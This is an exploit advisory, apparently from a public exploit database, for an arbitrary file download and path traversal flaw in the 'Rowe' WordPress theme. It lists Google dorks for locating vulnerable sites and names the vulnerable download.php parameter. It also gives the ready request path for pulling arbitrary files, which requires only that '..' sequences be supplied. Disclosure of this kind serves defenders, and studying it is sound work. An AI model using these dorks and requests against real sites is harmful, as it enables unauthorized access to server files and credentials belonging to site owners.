############################################################################################

# Exploit Title : WordPress 4.8.9 Rowe Themes Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepage : rowesa.co.za ~ knack.digital
knakdigital.com - wordpress.org
# Software Information Link : rowesa.co.za/#design-companies
# Software Affected Version : 4.8.9
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/rowe/''
intext:''Website designed by KNACK DIGITAL"
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
* WordPress 4.8.9 Rowe Themes is prone to a vulnerability that lets attackers download arbitrary files because the application 

fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the 

web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure

of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal 

vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not 

properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

############################################################################################

Vulnerable File :
***************** 
/download.php

Vulnerable Parameter :
********************
?download_file=

# Arbitrary File Download Exploit :
*******************************
/wp-content/themes/rowe/download/download.php?download_file=[FILENAME]

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################